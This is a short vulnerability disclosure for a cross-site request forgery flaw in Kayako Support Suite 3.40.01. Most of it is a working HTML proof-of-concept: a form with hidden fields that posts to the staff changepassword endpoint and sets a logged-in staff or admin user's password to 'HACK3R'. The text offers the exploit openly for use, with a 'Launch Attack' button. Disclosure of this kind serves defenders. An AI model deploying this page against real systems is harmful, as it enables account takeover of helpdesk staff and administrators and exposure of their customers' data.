|
Kayako e-Support Suit CSRF - password change vulnerability Software: Kayako Support Suit Version : Latest version [3.40.01] - not tested with older versions http://www.kayako.com/solutions/supportsuite Vulnerability Type: CSRF - User [Staff /Admin] Password Change Vulnerability Discovered by: Str0ss mail.str0ss[_aT]gmail[_dOt]com Ref : http://maestro-sec.com/forum/viewtopic.php?f=9&t=2006
About the software ------------------- Kayako e-Support incorporates Kayako's leading ticket and e-mail management support desk software, including knowledgebase, troubleshooter, news and downloads publishing tools. Offering end-users a variety of self help resources, such as guided troubleshooters and a searchable knowledgebase. This software is used by many Leading Companies. Exploit code -------------------- - For exploitation User[staff / Admin] should be logged in as staff to the eSupport suit. - User should click 'Launch Attack' button - After successful exploitation the victims password will be 'HACK3R' -------------------- <html> <body> <form name="staffform" id="staffform" action="http[s]://<TARGET>/staff/index.php?_m=core&_a=changepassword" method="POST"> <input type="hidden" name="password" id="password" value="HACK3R" size="20" /> <input type="hidden" name="passwordconfirm" id="passwordconfirm" value="HACK3R" size="20" /> <input type="submit" name="submitbutton" value="Launch Attack" /> <br> ** User [staff] must be logged in <input type="hidden" name="_m" value="core"/> <input type="hidden" name="_a" value="changepassword"/> <input type="hidden" name="step" value="1"/> </form> </body> </html>
|
